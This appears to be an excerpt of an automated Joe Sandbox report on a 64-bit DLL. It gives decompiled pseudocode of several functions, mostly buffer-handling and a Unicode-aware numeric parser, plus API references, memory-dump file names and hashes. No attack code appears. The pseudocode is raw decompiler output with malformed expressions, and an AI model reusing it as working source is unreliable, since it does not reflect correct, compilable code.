				long long _t250;
				void* _t251;
				long long _t257;

				_t207 = __rax;
				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				E00007FFA7FFA0AE621F0(__eflags, __rax, _a8, _a16);
				E00007FFA7FFA0AE621F0(__eflags, __rax, _a32, _a40);
				E00007FFA7FFA0AE62400(__eflags, __rax, _a8, _a16, _a24);
				_a24 = _t207;
				E00007FFA7FFA0AE62400(__eflags, _t207, _a32, _a40, _a48);
				_a48 = _t207;
				_t209 = 0xffffffff - _a48;
				_v120 = 0xffffffff;
				E00007FFA7FFA0AE62170(_t209, _a8);
				_t211 =  *_t209 - _a24;
				if (_v120 - 0xffffffff > 0) goto 0xae63315;
				E00007FFA7FFA0AE62230(_a8);
				E00007FFA7FFA0AE62170( *_t209 - _a24, _a8);
				_v136 = 0xffffffff;
				E00007FFA7FFA0AE62170( *_t211 - _a24 - _a16, _a8);
				_v128 = 0xffffffff;
				E00007FFA7FFA0AE62170( *((intOrPtr*)( *_t211 - _a24 - _a16)) + _a48 - _a24, _a8);
				if ( *0xffffffff - _v128 >= 0) goto 0xae6338e;
				r8d = 0;
				E00007FFA7FFA0AE622B0( *((intOrPtr*)( *_t211 - _a24 - _a16)) + _a48 - _a24, _a8, _v128);
				_t218 = _a24;
				if (_a48 != _t218) goto 0xae633ec;
				E00007FFA7FFA0AE618D0(_t218, _a32);
				_v112 = _t218 + _a40;
				E00007FFA7FFA0AE618F0(_t218 + _a40, _a8);
				E00007FFA7FFA0AE61230(_t218 + _a40 + _a16, _v112, _a48);
				goto 0xae63810;
				_t221 = _a32;
				if (_a8 == _t221) goto 0xae634a2;
				E00007FFA7FFA0AE618F0(_t221, _a8);
				_t223 = _t221 + _a16 + _a24;
				_v104 = _t223;
				E00007FFA7FFA0AE618F0(_t223, _a8);
				_t225 = _t223 + _a16 + _a48;
				E00007FFA7FFA0AE61230(_t225, _v104, _v136);
				E00007FFA7FFA0AE618D0(_t225, _a32);
				_v96 = _t225 + _a40;
				E00007FFA7FFA0AE618F0(_t225 + _a40, _a8);
				E00007FFA7FFA0AE611E0(_t225 + _a40 + _a16, _v96, _a48);
				goto 0xae63810;
				_t228 = _a24;
				if (_a48 - _t228 >= 0) goto 0xae63558;
				E00007FFA7FFA0AE618F0(_t228, _a8);
				_t229 = _t228 + _a40;
				_v88 = _t229;
				E00007FFA7FFA0AE618F0(_t229, _a8);
				_t230 = _t229 + _a16;
				E00007FFA7FFA0AE61230(_t230, _v88, _a48);
				E00007FFA7FFA0AE618F0(_t230, _a8);
				_v80 = _t230 + _a16 + _a24;
				E00007FFA7FFA0AE618F0(_t230 + _a16 + _a24, _a8);
				E00007FFA7FFA0AE61230(_t230 + _a16 + _a24 + _a16 + _a48, _v80, _v136);
				goto 0xae63810;
				_t235 = _a16;
				if (_a40 - _t235 > 0) goto 0xae6360e;
				E00007FFA7FFA0AE618F0(_t235, _a8);
				_t237 = _t235 + _a16 + _a24;
				_v72 = _t237;
				E00007FFA7FFA0AE618F0(_t237, _a8);
				_t239 = _t237 + _a16 + _a48;
				E00007FFA7FFA0AE61230(_t239, _v72, _v136);
				E00007FFA7FFA0AE618F0(_t239, _a8);
				_v64 = _t239 + _a40;
				E00007FFA7FFA0AE618F0(_t239 + _a40, _a8);
				E00007FFA7FFA0AE61230(_t239 + _a40 + _a16, _v64, _a48);
				goto 0xae63810;
				_t243 = _a16 + _a24;
				if (_t243 - _a40 > 0) goto 0xae636eb;
				E00007FFA7FFA0AE618F0(_t243, _a8);
				_t245 = _t243 + _a16 + _a24;
				_v56 = _t245;
				E00007FFA7FFA0AE618F0(_t245, _a8);
				_t247 = _t245 + _a16 + _a48;
				E00007FFA7FFA0AE61230(_t247, _v56, _v136);
				E00007FFA7FFA0AE618F0(_t247, _a8);
				_t248 = _t247 + _a40 + _a48 - _a24;
				_v48 = _t248;
				E00007FFA7FFA0AE618F0(_t248, _a8);
				_t249 = _t248 + _a16;
				E00007FFA7FFA0AE61230(_t249, _v48, _a48);
				goto 0xae63810;
				E00007FFA7FFA0AE618F0(_t249, _a8);
				_t250 = _t249 + _a40;
				_v40 = _t250;
				E00007FFA7FFA0AE618F0(_t250, _a8);
				_t251 = _t250 + _a16;
				E00007FFA7FFA0AE61230(_t251, _v40, _a24);
				E00007FFA7FFA0AE618F0(_t251, _a8);
				_v32 = _t251 + _a16 + _a24;
				E00007FFA7FFA0AE618F0(_t251 + _a16 + _a24, _a8);
				E00007FFA7FFA0AE61230(_t251 + _a16 + _a24 + _a16 + _a48, _v32, _v136);
				_t257 = _a48 - _a24;
				_v24 = _t257;
				E00007FFA7FFA0AE618F0(_t257, _a8);
				_t259 = _t257 + _a40 + _a48;
				_v16 = _t257 + _a40 + _a48;
				E00007FFA7FFA0AE618F0(_t257 + _a40 + _a48, _a8);
				E00007FFA7FFA0AE61230(_t259 + _a16 + _a24, _v16, _v24);
				return E00007FFA7FFA0AE623A0(_t259 + _a16 + _a24, _a8, _v128);
			}

0x7ffa0ae63240
0x7ffa0ae63240
0x7ffa0ae63245
0x7ffa0ae6324a
0x7ffa0ae6324f
0x7ffa0ae6326b
0x7ffa0ae63280
0x7ffa0ae6329d
0x7ffa0ae632a2
0x7ffa0ae632c2
0x7ffa0ae632c7
0x7ffa0ae632d6
0x7ffa0ae632de
0x7ffa0ae632eb
0x7ffa0ae632fb
0x7ffa0ae63306
0x7ffa0ae63310
0x7ffa0ae6331d
0x7ffa0ae63338
0x7ffa0ae63345
0x7ffa0ae6335d
0x7ffa0ae6336a
0x7ffa0ae63377
0x7ffa0ae63379
0x7ffa0ae63389
0x7ffa0ae6338e
0x7ffa0ae6339e
0x7ffa0ae633a8
0x7ffa0ae633b5
0x7ffa0ae633c2
0x7ffa0ae633e2
0x7ffa0ae633e7
0x7ffa0ae633ec
0x7ffa0ae633fc
0x7ffa0ae6340a
0x7ffa0ae63417
0x7ffa0ae6341f
0x7ffa0ae6342c
0x7ffa0ae63439
0x7ffa0ae63451
0x7ffa0ae6345e
0x7ffa0ae6346b
0x7ffa0ae63478
0x7ffa0ae63498
0x7ffa0ae6349d
0x7ffa0ae634a2
0x7ffa0ae634b2
0x7ffa0ae634c0
0x7ffa0ae634c5
0x7ffa0ae634cd
0x7ffa0ae634da
0x7ffa0ae634df
0x7ffa0ae634fa
0x7ffa0ae63507
0x7ffa0ae6351c
0x7ffa0ae63529
0x7ffa0ae6354e
0x7ffa0ae63553
0x7ffa0ae63558
0x7ffa0ae63568
0x7ffa0ae63576
0x7ffa0ae63583
0x7ffa0ae6358b
0x7ffa0ae63598
0x7ffa0ae635a5
0x7ffa0ae635bd
0x7ffa0ae635ca
0x7ffa0ae635d7
0x7ffa0ae635e4
0x7ffa0ae63604
0x7ffa0ae63609
0x7ffa0ae63621
0x7ffa0ae6362c
0x7ffa0ae6363a
0x7ffa0ae63647
0x7ffa0ae6364f
0x7ffa0ae6365c
0x7ffa0ae63669
0x7ffa0ae63681
0x7ffa0ae6368e
0x7ffa0ae636b1
0x7ffa0ae636b4
0x7ffa0ae636c1
0x7ffa0ae636c6
0x7ffa0ae636e1
0x7ffa0ae636e6
0x7ffa0ae636f3
0x7ffa0ae636f8
0x7ffa0ae63700
0x7ffa0ae63710
0x7ffa0ae63715
0x7ffa0ae63733
0x7ffa0ae63740
0x7ffa0ae63755
0x7ffa0ae63765
0x7ffa0ae6378d
0x7ffa0ae637a5
0x7ffa0ae637a8
0x7ffa0ae637b8
0x7ffa0ae637c5
0x7ffa0ae637cd
0x7ffa0ae637dd
0x7ffa0ae6380b
0x7ffa0ae63831

APIs

Part of subcall function 00007FFA0AE621F0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA0AE62217

Part of subcall function 00007FFA0AE62170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE6217E

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA0AE63310
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE633A8
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE633C2
char_traits.LIBCPMTD ref: 00007FFA0AE633E2
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE6342C
char_traits.LIBCPMTD ref: 00007FFA0AE63451
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE6345E

Part of subcall function 00007FFA0AE618D0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE618DE

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE63478
char_traits.LIBCPMTD ref: 00007FFA0AE63498
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE6340A

Part of subcall function 00007FFA0AE618F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE618FE

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE634C0
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE634DA
char_traits.LIBCPMTD ref: 00007FFA0AE634FA
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE63507
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE63529
char_traits.LIBCPMTD ref: 00007FFA0AE6354E

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityQueue$char_traits$EmptyQueue::Structured$Mtx_guardMtx_guard::~_
String ID:
API String ID: 1550686663-0
Opcode ID: 0f1bb589e47f93316061ca26cfb9dee95abb047e9eba5aea19f5295e06850146
Instruction ID: 19ff0b25725ff6d0bacc67158e1e14e3c467c299f4cf2c5509c4da0929a16f7a
Opcode Fuzzy Hash: 0f1bb589e47f93316061ca26cfb9dee95abb047e9eba5aea19f5295e06850146
Instruction Fuzzy Hash: C3D1A877A1DBD185DA70EB65F4913AAB361FBC97C4F008522DA8D83B6ADF2CD0448B01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE62FC0 Relevance: 15.1, APIs: 10, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00007FFA7FFA0AE62FC0(void* __edx, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, long long _a40) {
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				long long _v64;
				long long _v72;
				long long _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				long long _t108;
				long long _t110;
				intOrPtr* _t112;
				intOrPtr _t116;
				long long _t118;

				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if ((E00007FFA7FFA0AE62250(__rax, _a8, _a32) & 0x000000ff) == 0) goto 0xae6303c;
				E00007FFA7FFA0AE618F0(__rax, _a8);
				_t100 = _a32 - __rax;
				_v64 = _a40;
				_v72 = _t100;
				E00007FFA7FFA0AE63240(__edx, E00007FFA7FFA0AE62250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16, _a24, _a8);
				goto 0xae63214;
				E00007FFA7FFA0AE621F0(E00007FFA7FFA0AE62250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16);
				E00007FFA7FFA0AE62400(E00007FFA7FFA0AE62250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16, _a24);
				_a24 = _t100;
				_t102 = 0xffffffff - _a40;
				_v40 = 0xffffffff;
				E00007FFA7FFA0AE62170(_t102, _a8);
				_t104 =  *_t102 - _a24;
				if (_v40 - 0xffffffff > 0) goto 0xae630aa;
				E00007FFA7FFA0AE62230(_a8);
				E00007FFA7FFA0AE62170(_t104, _a8);
				_v56 =  *_t104 - _a24 - _a16;
				_t108 = _a24;
				if (_a40 - _t108 >= 0) goto 0xae63126;
				E00007FFA7FFA0AE618F0(_t108, _a8);
				_t110 = _t108 + _a16 + _a24;
				_v32 = _t110;
				E00007FFA7FFA0AE618F0(_t110, _a8);
				_t112 = _t110 + _a16 + _a40;
				E00007FFA7FFA0AE61230(_t112, _v32, _v56);
				E00007FFA7FFA0AE62170(_t112, _a8);
				_v48 =  *_t112 + _a40 - _a24;
				if (_a40 > 0) goto 0xae63162;
				if (_a24 <= 0) goto 0xae6320f;
				r8d = 0;
				if ((E00007FFA7FFA0AE622B0( *_t112 + _a40 - _a24, _a8, _v48) & 0x000000ff) == 0) goto 0xae6320f;
				_t116 = _a40;
				if (_a24 - _t116 >= 0) goto 0xae631d9;
				E00007FFA7FFA0AE618F0(_t116, _a8);
				_t118 = _t116 + _a16 + _a24;
				_v24 = _t118;
				E00007FFA7FFA0AE618F0(_t118, _a8);
				_t120 = _t118 + _a16 + _a40;
				E00007FFA7FFA0AE61230(_t118 + _a16 + _a40, _v24, _v56);
				E00007FFA7FFA0AE618F0(_t118 + _a16 + _a40, _a8);
				E00007FFA7FFA0AE611E0(_t120 + _a16, _a32, _a40);
				return E00007FFA7FFA0AE623A0(_t120 + _a16, _a8, _v48);
			}

0x7ffa0ae62fc0
0x7ffa0ae62fc5
0x7ffa0ae62fca
0x7ffa0ae62fcf
0x7ffa0ae62fef
0x7ffa0ae62ff6
0x7ffa0ae63006
0x7ffa0ae63011
0x7ffa0ae63016
0x7ffa0ae63032
0x7ffa0ae63037
0x7ffa0ae63046
0x7ffa0ae6305d
0x7ffa0ae63062
0x7ffa0ae63071
0x7ffa0ae63079
0x7ffa0ae63083
0x7ffa0ae63093
0x7ffa0ae6309e
0x7ffa0ae630a5
0x7ffa0ae630af
0x7ffa0ae630c7
0x7ffa0ae630cc
0x7ffa0ae630dc
0x7ffa0ae630e3
0x7ffa0ae630ed
0x7ffa0ae630f5
0x7ffa0ae630ff
0x7ffa0ae63109
0x7ffa0ae63121
0x7ffa0ae6312b
0x7ffa0ae63143
0x7ffa0ae63151
0x7ffa0ae6315c
0x7ffa0ae63162
0x7ffa0ae63179
0x7ffa0ae6317f
0x7ffa0ae6318f
0x7ffa0ae63196
0x7ffa0ae631a0
0x7ffa0ae631a8
0x7ffa0ae631b2
0x7ffa0ae631bc
0x7ffa0ae631d4
0x7ffa0ae631de
0x7ffa0ae631fb
0x7ffa0ae63218

APIs

Part of subcall function 00007FFA0AE62250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE6226B
Part of subcall function 00007FFA0AE62250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE6227C

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE62FF6

Part of subcall function 00007FFA0AE618F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE618FE

Part of subcall function 00007FFA0AE63240: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA0AE63310
Part of subcall function 00007FFA0AE63240: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE633A8
Part of subcall function 00007FFA0AE63240: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE633C2
Part of subcall function 00007FFA0AE63240: char_traits.LIBCPMTD ref: 00007FFA0AE633E2

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA0AE630A5
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE630E3
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE630FF
char_traits.LIBCPMTD ref: 00007FFA0AE63121
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE63196
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE631B2
char_traits.LIBCPMTD ref: 00007FFA0AE631D4
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE631DE
char_traits.LIBCPMTD ref: 00007FFA0AE631FB

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityQueue$char_traits$Mtx_guardMtx_guard::~_$EmptyQueue::Structured
String ID:
API String ID: 4284633421-0
Opcode ID: fedfd89c1444a20ff6c1338be1c38f592e3b580ca3ebc7448f5feb0f8b9903a7
Instruction ID: 5bc97bbf82d95cb72c9306703566606803c97622fb47735216cbf19e36c7e388
Opcode Fuzzy Hash: fedfd89c1444a20ff6c1338be1c38f592e3b580ca3ebc7448f5feb0f8b9903a7
Instruction Fuzzy Hash: 0B51C037A1CAD186DA50EB79F45136AA3A0FBC57C4F105562EBCD87B6ADF2CD4418B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6893C Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 489
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00007FFA7FFA0AE6893C(signed short* __rax, long long __rbx, long long __rcx, signed short** __rdx, void* __r8, long long _a8, intOrPtr _a16, long long _a24) {
				void* _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				long long _v160;
				long long _v168;
				void* __rsi;
				void* __rbp;
				void* _t155;
				void* _t185;
				signed short _t199;
				signed short _t200;
				signed int _t201;
				signed int _t250;
				signed int _t252;
				signed int _t254;
				signed int _t255;
				signed int _t258;
				signed int _t261;
				signed short* _t380;
				signed short* _t381;
				signed short* _t382;
				signed short* _t384;
				signed short** _t385;
				long long _t386;
				long long* _t389;
				signed short* _t390;
				long long* _t394;
				long long* _t395;
				long long* _t396;
				signed short** _t397;
				void* _t398;
				void* _t399;
				signed short* _t404;
				signed short* _t405;
				long long _t406;
				signed short* _t407;
				long long _t408;
				intOrPtr _t409;

				_t403 = __r8;
				_t394 = __rdx;
				_t386 = __rbx;
				_a24 = __rbx;
				_a8 = __rcx;
				_t406 =  *((intOrPtr*)(__rdx));
				r13d = 0;
				_t255 = r9b & 0xffffffff;
				r14d = r8d;
				_v64 = _t406;
				_t397 = __rdx;
				if (_t406 != 0) goto 0xae68987;
				E00007FFA7FFA0AE6B420(__rax);
				 *__rax = 0x16;
				E00007FFA7FFA0AE69744();
				goto 0xae689b9;
				if (r14d == 0) goto 0xae689d1;
				_t4 = _t403 - 2; // -2
				if (_t4 - 0x22 <= 0) goto 0xae689d1;
				_v160 = __rcx;
				r9d = 0;
				 *((char*)(__rcx + 0x30)) = 1;
				r8d = 0;
				 *(__rcx + 0x2c) = 0x16;
				_v168 = _t408;
				E00007FFA7FFA0AE69674(__rax, __rbx, __rcx, __rdx, _t398, _t399, __r8);
				_t389 = _t397[1];
				if (_t389 == 0) goto 0xae6901d;
				 *_t389 =  *_t397;
				goto 0xae6901d;
				 *_t394 = _t406 + 2;
				_t260 = r13d;
				if ( *((intOrPtr*)(_t389 + 0x28)) != r13b) goto 0xae689fb;
				0xae69140();
				goto 0xae689fb;
				_t378 =  *_t397;
				 *_t397 =  &(( *_t397)[1]);
				if (E00007FFA7FFA0AE6B244( *_t378 & 0xffff, 8, _t386, _t389) != 0) goto 0xae689ee;
				_t257 =  !=  ? _t255 : _t255 | 0x00000002;
				if ((0x0000fffd & _t386 - 0x0000002b) != 0) goto 0xae68a32;
				_t380 =  *_t397;
				_t199 =  *_t380 & 0x0000ffff;
				_t381 =  &(_t380[1]);
				 *_t397 = _t381;
				_a16 = 0xa70;
				_v152 = 0xae6;
				_v148 = 0xaf0;
				_v144 = 0xb66;
				r8d = 0x660;
				_v140 = 0xb70;
				_t20 = _t381 - 0x80; // 0x5e0
				r9d = _t20;
				_v136 = 0xc66;
				r10d = 0x6f0;
				_v132 = 0xc70;
				r11d = 0x966;
				_v128 = 0xce6;
				_v124 = 0xcf0;
				_v120 = 0xd66;
				_v116 = 0xd70;
				_v112 = 0xe50;
				_v108 = 0xe5a;
				_v104 = 0xed0;
				_v100 = 0xeda;
				_v96 = 0xf20;
				_v92 = 0xf2a;
				_v88 = 0x1040;
				_v84 = 0x104a;
				_v80 = 0x17e0;
				_v76 = 0x17ea;
				_v72 = 0x1810;
				_v68 = 0xff1a;
				if ((r14d & 0xffffffef) != 0) goto 0xae68da0;
				if (_t199 - 0x30 < 0) goto 0xae68cef;
				if (_t199 - 0x3a >= 0) goto 0xae68b3e;
				goto 0xae68cea;
				if (_t199 - 0xff10 >= 0) goto 0xae68cdb;
				if (_t199 - r8w < 0) goto 0xae68cef;
				if (_t199 - 0x66a >= 0) goto 0xae68b66;
				goto 0xae68cea;
				if (_t199 - r10w < 0) goto 0xae68cef;
				if (_t199 - 0x6fa >= 0) goto 0xae68b85;
				goto 0xae68cea;
				if (_t199 - r11w < 0) goto 0xae68cef;
				if (_t199 - 0x970 >= 0) goto 0xae68ba4;
				goto 0xae68cea;
				if (_t199 - r9w < 0) goto 0xae68cef;
				if (_t199 - 0x9f0 >= 0) goto 0xae68bc3;
				goto 0xae68cea;
				if (_t199 - (_t199 & 0x0000ffff) - r9d < 0) goto 0xae68cef;
				if (_t199 - _a16 >= 0) goto 0xae68be3;
				goto 0xae68cea;
				if (_t199 - _v152 < 0) goto 0xae68cef;
				if (_t199 - _v148 < 0) goto 0xae68b34;
				if (_t199 - _v144 < 0) goto 0xae68cef;
				if (_t199 - _v140 < 0) goto 0xae68b34;
				if (_t199 - _v136 < 0) goto 0xae68cef;
				if (_t199 - _v132 < 0) goto 0xae68b34;
				if (_t199 - _v128 < 0) goto 0xae68cef;
				if (_t199 - _v124 < 0) goto 0xae68b34;
				if (_t199 - _v120 < 0) goto 0xae68cef;
				if (_t199 - _v116 < 0) goto 0xae68b34;
				if (_t199 - _v112 < 0) goto 0xae68cef;
				if (_t199 - _v108 < 0) goto 0xae68b34;
				if (_t199 - _v104 < 0) goto 0xae68cef;
				if (_t199 - _v100 < 0) goto 0xae68b34;
				if (_t199 - _v96 < 0) goto 0xae68cef;
				if (_t199 - _v92 < 0) goto 0xae68b34;
				if (_t199 - _v88 < 0) goto 0xae68cef;
				if (_t199 - _v84 < 0) goto 0xae68b34;
				if (_t199 - _v80 < 0) goto 0xae68cef;
				if (_t199 - _v76 < 0) goto 0xae68b34;
				if ((_t199 & 0x0000ffff) - _v72 - 9 > 0) goto 0xae68cef;
				goto 0xae68b34;
				if (_t199 - _v68 >= 0) goto 0xae68cef;
				if ((_t199 & 0x0000ffff) - 0xff10 != 0xffffffff) goto 0xae68d11;
				_t64 = _t389 - 0x41; // -17
				_t65 = _t389 - 0x61; // -49
				_t155 = _t65;
				if (_t64 - 0x19 <= 0) goto 0xae68d06;
				if (_t155 - 0x19 > 0) goto 0xae68d91;
				if (_t155 - 0x19 > 0) goto 0xae68d0e;
				_t66 = _t389 - 0x37; // -231
				if (_t66 != 0) goto 0xae68d91;
				_t390 =  *_t397;
				r9d = 0xffdf;
				_t250 =  *_t390 & 0x0000ffff;
				_t67 =  &(_t390[1]); // 0xffe1
				_t404 = _t67;
				 *_t397 = _t404;
				_t68 = _t394 - 0x58; // 0x698
				if ((r9w & _t68) == 0) goto 0xae68d79;
				 *_t397 = _t390;
				_t159 =  !=  ? r14d : 8;
				r14d =  !=  ? r14d : 8;
				if (_t250 == 0) goto 0xae68d71;
				if ( *_t390 == _t250) goto 0xae68d71;
				E00007FFA7FFA0AE6B420(_t381);
				 *_t381 = 0x16;
				E00007FFA7FFA0AE69744();
				r8d = 0x660;
				r10d = 0x6f0;
				r11d = 0x966;
				goto 0xae68da0;
				r8d = 0x660;
				goto 0xae68da0;
				_t200 =  *_t404 & 0x0000ffff;
				_t71 =  &(_t404[1]); // 0xffe3
				_t382 = _t71;
				 *_t397 = _t382;
				r8d = 0x660;
				goto 0xae68d96;
				_t164 =  !=  ? r14d : 0xa;
				r14d = 0xa;
				_t165 = ( !=  ? r14d : 0xa) | 0xffffffff;
				_t73 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
				_t252 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
				r12d = 0x30;
				r15d = 0xff10;
				r9d = 0xa / r14d;
				if (_t200 - r12w < 0) goto 0xae68f70;
				if (_t200 - 0x3a >= 0) goto 0xae68dd2;
				goto 0xae68f6b;
				if (_t200 - r15w >= 0) goto 0xae68f5b;
				if (_t200 - r8w < 0) goto 0xae68f70;
				if (_t200 - 0x66a >= 0) goto 0xae68dfb;
				goto 0xae68f6b;
				if (_t200 - r10w < 0) goto 0xae68f70;
				if (_t200 - 0x6fa >= 0) goto 0xae68e1a;
				goto 0xae68f6b;
				if (_t200 - r11w < 0) goto 0xae68f70;
				if (_t200 - 0x970 >= 0) goto 0xae68e39;
				goto 0xae68f6b;
				if (_t200 - 0x9e6 < 0) goto 0xae68f70;
				_t76 =  &(_t382[5]); // 0x9f0
				if (_t200 - _t76 >= 0) goto 0xae68e59;
				goto 0xae68f6b;
				if (_t200 - 0xa66 < 0) goto 0xae68f70;
				if (_t200 - _a16 < 0) goto 0xae68e4f;
				if (_t200 - _v152 < 0) goto 0xae68f70;
				if (_t200 - _v148 < 0) goto 0xae68e4f;
				if (_t200 - _v144 < 0) goto 0xae68f70;
				if (_t200 - _v140 < 0) goto 0xae68e4f;
				if (_t200 - _v136 < 0) goto 0xae68f70;
				if (_t200 - _v132 < 0) goto 0xae68e4f;
				if (_t200 - _v128 < 0) goto 0xae68f70;
				if (_t200 - _v124 < 0) goto 0xae68e4f;
				if (_t200 - _v120 < 0) goto 0xae68f70;
				if (_t200 - _v116 < 0) goto 0xae68e4f;
				if (_t200 - _v112 < 0) goto 0xae68f70;
				if (_t200 - _v108 < 0) goto 0xae68e4f;
				if (_t200 - _v104 < 0) goto 0xae68f70;
				if (_t200 - _v100 < 0) goto 0xae68e4f;
				if (_t200 - _v96 < 0) goto 0xae68f70;
				if (_t200 - _v92 < 0) goto 0xae68e4f;
				if (_t200 - _v88 < 0) goto 0xae68f70;
				if (_t200 - _v84 < 0) goto 0xae68e4f;
				if (_t200 - _v80 < 0) goto 0xae68f70;
				if (_t200 - _v76 < 0) goto 0xae68e4f;
				if ((_t200 & 0x0000ffff) - _v72 - 9 > 0) goto 0xae68f70;
				goto 0xae68f6b;
				if (_t200 - _v68 >= 0) goto 0xae68f70;
				if ((_t200 & 0x0000ffff) - r15d != 0xffffffff) goto 0xae68f93;
				_t100 = _t390 - 0x41; // -65
				_t101 = _t390 - 0x61; // -97
				_t185 = _t101;
				if (_t100 - 0x19 <= 0) goto 0xae68f83;
				if (_t185 - 0x19 > 0) goto 0xae68f90;
				if (_t185 - 0x19 > 0) goto 0xae68f8b;
				goto 0xae68f93;
				_t405 =  *_t397;
				if (((_t200 & 0x0000ffff) + 0x1ffffffa9 | 0xffffffff) - r14d >= 0) goto 0xae68fd7;
				_t201 =  *_t405 & 0x0000ffff;
				_t254 = _t382 + _t390;
				_t261 = _t254;
				_t107 =  &(_t405[1]); // 0x2
				r8d = 0x660;
				 *_t397 = _t107;
				_t258 = ( !=  ? _t255 : _t255 | 0x00000002) | (r13d & 0xffffff00 | _t254 - r13d * r14d > 0x00000000 | r13d & 0xffffff00 | _t260 - r9d > 0x00000000) << 0x00000002 | 0x00000008;
				goto 0xae68db7;
				_t409 = _a8;
				_t109 = _t405 - 2; // -2
				_t384 = _t109;
				_t407 = _v64;
				 *_t397 = _t384;
				if (_t201 == 0) goto 0xae69008;
				if ( *_t384 == _t201) goto 0xae69008;
				E00007FFA7FFA0AE6B420(_t384);
